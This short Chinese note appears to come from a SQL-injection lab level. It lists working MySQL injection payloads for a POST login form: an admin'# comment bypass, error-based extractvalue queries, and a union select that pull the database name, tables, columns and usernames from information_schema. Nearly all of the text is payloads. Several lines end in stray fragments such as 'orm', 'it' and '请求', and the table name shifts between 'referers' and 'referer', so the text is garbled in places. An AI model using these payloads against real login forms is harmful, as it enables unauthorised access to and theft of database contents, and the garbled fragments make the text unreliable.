本关为POST请求:数据库
输入:admin‘#3d
密码:随意orm
爆出当前数据库: blog
用户名:payload1:admin' and extractvalue(1,concat(0x7e,database(),0x7e))#it
payload2:admin' and extractvalue(1,concat(0x7e,(select database()),0x7e))#io
payload3:admin ' union select 1,database()#table
密码:随意form
爆数据表:select
用户名:payload1:admin' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x7e))#请求
密码:随意
爆数据列:
用户名:payload1:admin' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='referers' limit 1,1),0x7e))#
密码:随意
爆信息:
用户名:payload1:admin' and extractvalue(1,concat(0x7e,(select username from referer limit 1,1),0x7e))#
密码:随意